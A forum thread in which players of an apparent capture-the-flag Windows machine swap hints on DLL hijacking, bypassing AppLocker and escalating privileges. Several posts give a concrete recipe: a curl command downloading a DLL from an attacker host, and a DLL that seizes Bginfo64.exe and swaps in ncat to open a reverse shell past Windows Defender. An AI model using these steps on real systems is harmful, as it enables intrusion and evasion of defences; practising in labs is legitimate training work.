Posts: 42 Threads: 0 Joined: N/A April 27, 2022 at 3:34 AM (April 23, 2022, 09:19 PM)Exa Wrote: (April 23, 2022, 07:02 PM)yemacaw863 Wrote: (April 23, 2022, 02:53 PM)joeydalips Wrote: (April 23, 2022, 01:26 PM)cavour12 Wrote: Next step is DLL Hijacking ! :D
Bar the 7-zip dll on the share drive, which we can write to ... any other ideas why it's a dll hijack ? seems like it's more of a replacement then hijacking really
Refer to https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking for DLL hijacking
The second one under "Your own" works.. got the user flag.. But what's next? :cry:
This user is a member of ITDep, while ITDep is a member of Account Operators...
Tried changing password, creating new account, adding to other group, but none work :(
Any nudge will be appreciated.. thanks
I got code execution too. Did you get a (reverse) shell as ginawild? what payload did you use to get a shell as ginawild? I've been trying for the last hour Posts: 42 Threads: 0 Joined: N/A April 27, 2022 at 10:04 AM How can I bypass applocker... I've tried running scans to look for dir's that aren't blocked and got nothing... standard dir's like /windows/temp and /windows/tasks don't work either... this shell is killing me :( Posts: 48 Threads: 0 Joined: N/A April 27, 2022 at 11:59 AM Anyone with root part? Posts: 213 Threads: 0 Joined: N/A April 27, 2022 at 12:11 PM (April 27, 2022, 10:04 AM)qwerty173 Wrote: How can I bypass applocker... I've tried running scans to look for dir's that aren't blocked and got nothing... standard dir's like /windows/temp and /windows/tasks don't work either... this shell is killing me :( When you run "Get-AppLockerPolicy -effective -xml" you will notice that Bginfo64.exe is allowed. Try replacing that with your own binary as ginawild. Posts: 21 Threads: 0 Joined: N/A April 27, 2022 at 5:20 PM (April 27, 2022, 03:34 AM)qwerty173 Wrote: (April 23, 2022, 09:19 PM)Exa Wrote: (April 23, 2022, 07:02 PM)yemacaw863 Wrote: (April 23, 2022, 02:53 PM)joeydalips Wrote: (April 23, 2022, 01:26 PM)cavour12 Wrote: Next step is DLL Hijacking ! :D
Bar the 7-zip dll on the share drive, which we can write to ... any other ideas why it's a dll hijack ? seems like it's more of a replacement then hijacking really
Refer to https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking for DLL hijacking
The second one under "Your own" works.. got the user flag.. But what's next? :cry:
This user is a member of ITDep, while ITDep is a member of Account Operators...
Tried changing password, creating new account, adding to other group, but none work :(
Any nudge will be appreciated.. thanks
I got code execution too. Did you get a (reverse) shell as ginawild?
what payload did you use to get a shell as ginawild? I've been trying for the last hour The payload is proving difficult alright to get a shell back the the user.. Posts: 30 Threads: 0 Joined: N/A April 28, 2022 at 7:10 AM how to get ginawild shell. Posts: 42 Threads: 0 Joined: N/A April 28, 2022 at 8:21 AM (April 28, 2022, 07:10 AM)___user___ Wrote: how to get ginawild shell. im still stuck on getting the shell too... i've figured out how to change the bginfo owner and permission set but still doesn't let me write to it... Posts: 213 Threads: 0 Joined: N/A April 29, 2022 at 8:33 AM (April 28, 2022, 01:04 PM)jon01 Wrote: (April 27, 2022, 03:18 AM)qwerty173 Wrote: (April 26, 2022, 08:15 PM)joeydalips Wrote: (April 26, 2022, 05:40 PM)Exa Wrote: (April 26, 2022, 11:26 AM)teksius Wrote: What dll did you replace ?
There is only one DLL in that share.
Take the second "Your own" code sample from https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/dll-hijacking#your-own and compile it with x86_64-w64-mingw32-gcc.
First, try a simple command like "whoami > C:\Test\whoami.txt".
To upload files, you can use curl in the cmd.
How do you replace the dll tho ? neither web of the BM user appear to be able to write to the share..
curl it to the root of the share and then use copy to copy it into the /shares folder and overwrite it
means ? curl http://10.10.xxx.xxx/7-zip64.dll -o W:\scripts\7-zip64.dll My 7-zip64.dll does 4 things: - takeown /f C:\\share\\Bginfo64.exe
- Grant full privileges on C:\\share\\Bginfo64.exe to everyone
- Use curl to replace C:\\share\\Bginfo64.exe with ncat.exe (https://github.com/cyberisltd/NcatPortable)
- Run C:\\share\\Bginfo64.exe to spawn a reverse shell
It was tricky to find a reverse shell which didn't trigger Windows Defence. This ncat.exe worked for me. Posts: 48 Threads: 0 Joined: N/A April 29, 2022 at 1:30 PM (April 29, 2022, 10:07 AM)jon01 Wrote: (April 22, 2022, 01:05 PM)cavour12 Wrote: I tried to exploit BM with a impersonation aspx vb script but i think it's not allowed by the line xml <identity impersonate="false" in Web.config
so i think it's a rabbit hole
ALSO THIS WE CAN IMPERSONATE USER ;) ;) ;) ;) ;)
Any idea what next ? to root the box? Posts: 42 Threads: 0 Joined: N/A April 30, 2022 at 6:27 AM crack the pfx file password. i noticed that you can't run ps1 files without a digital signature, so that's what im trying now. if anyone else has any other information that would be great |
